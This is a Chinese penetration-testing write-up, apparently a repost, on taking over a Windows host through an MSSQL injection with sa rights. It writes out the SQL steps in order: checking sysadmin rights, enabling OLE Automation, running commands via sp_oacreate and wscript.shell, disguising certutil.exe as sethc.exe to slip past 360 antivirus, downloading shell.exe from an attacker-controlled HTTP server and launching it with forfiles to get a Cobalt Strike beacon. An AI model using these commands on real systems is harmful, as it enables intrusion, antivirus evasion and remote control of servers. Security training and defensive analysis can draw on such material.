暂无图片
暂无图片
暂无图片
暂无图片
暂无图片
首页 / 实战 | 记一次利用mssql上线

实战 | 记一次利用mssql上线

F12sec 2021-08-12
1584

前言


漏洞挖掘 在一次渗透测试过程中,对主站进行漏洞挖掘无果后,对子站进行挖掘。在子站发现mssql注入漏洞 Getshell


Part.1 漏洞挖掘


在一次渗透测试过程中,对主站进行漏洞挖掘无果后,对子站进行挖掘。

在子站发现mssql注入漏洞




Part.2 Getshell


发现360

    1=(select is_srvrolemember(‘sysadmin’))
    复制

      host_name()!=@@servername
      复制

      判断出权限为sa权限,且站库分离,写不了webshell。然后用sqlmap跑os-shell,发现执行命令无效。

      使用

        EXEC sp_configure ‘show advanced options’,1 RECONFIGURE EXEC sp_configure ‘xp_cmdshell’,1 RECONFIGURE;
        复制

        尝试开启xp_cmdshell依旧无效。

          create table tmp(dir ntext,num int)
          复制

          创建表,然后用

            insert tmp execute master..xp_dirtree ‘c:/’
            复制

            1将c盘目录插入表中,查看表发现360,之前命令都被360拦截了。








            Part.3 绕过360上线CS


            经过上网搜索之后,发现可以用sp_oacreate执行命令。

            开启sp_oacreate:


              exec sp_configure 'show advanced options', 1;  RECONFIGURE;  exec sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;
              复制

              构造命令语句,因为使用sp_oacreate执行命令是无回显的,使用dnslog平台进行判断:


                Declare @runshell INT Exec SP_OACreate 'wscript.shell',@runshell out Exec SP_OAMeTHOD @runshell,'run',null,'ping who.xxxx.dnslog.cn';
                复制


                但是使用certutil.exe,wmic,mshta等任然无效

                利用sp_oacreate构造语句,将certutil.exe复制到c:\windows\temp\下,并重命名为sethc.exe:


                  declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\certutil.exe' ,'c:\windows\temp\sethc.exe';
                  复制

                  在服务器上用python开启http服务,然后使用命令远程下载exe文件:


                    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\Temp\sethc.exe -urlcache -split -f "http://ip:port/shell.exe" C:\Windows\Temp\shell.exe'
                    复制


                    木马是传上去了,但是运行不了。。。。

                    最后请教Se10rc大佬,可以用forfiles c test.exe,既:


                      Declare @runshell INT Exec SP_OACreate 'wscript.shell',@runshell out Exec SP_OAMeTHOD @runshell,'run',null,'forfiles c shell.exe';


                      复制






                      扫码二维码

                      获取更多姿势

                      F12sec



                      往期推荐

                                实战 | 记一次某大学弱口令+Nday
                                实战 | 记一次文件上传多重bypass
                      数据库
                      文章转载自F12sec,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

                      评论

                      相关阅读

                      2025年4月中国数据库流行度排行榜:OB高分复登顶,崖山稳驭撼十强
                      墨天轮编辑部
                      2546次阅读
                      2025-04-09 15:33:27
                      数据库国产化替代深化:DBA的机遇与挑战
                      代晓磊
                      1186次阅读
                      2025-04-27 16:53:22
                      2025年3月国产数据库中标情况一览:TDSQL大单622万、GaussDB大单581万……
                      通讯员
                      861次阅读
                      2025-04-10 15:35:48
                      2025年4月国产数据库中标情况一览:4个千万元级项目,GaussDB与OceanBase大放异彩!
                      通讯员
                      679次阅读
                      2025-04-30 15:24:06
                      数据库,没有关税却有壁垒
                      多明戈教你玩狼人杀
                      583次阅读
                      2025-04-11 09:38:42
                      天津市政府数据库框采结果公布,7家数据库产品入选!
                      通讯员
                      569次阅读
                      2025-04-10 12:32:35
                      国产数据库需要扩大场景覆盖面才能在竞争中更有优势
                      白鳝的洞穴
                      547次阅读
                      2025-04-14 09:40:20
                      【活动】分享你的压箱底干货文档,三篇解锁进阶奖励!
                      墨天轮编辑部
                      487次阅读
                      2025-04-17 17:02:24
                      一页概览:Oracle GoldenGate
                      甲骨文云技术
                      464次阅读
                      2025-04-30 12:17:56
                      GoldenDB数据库v7.2焕新发布,助力全行业数据库平滑替代
                      GoldenDB分布式数据库
                      457次阅读
                      2025-04-30 12:17:50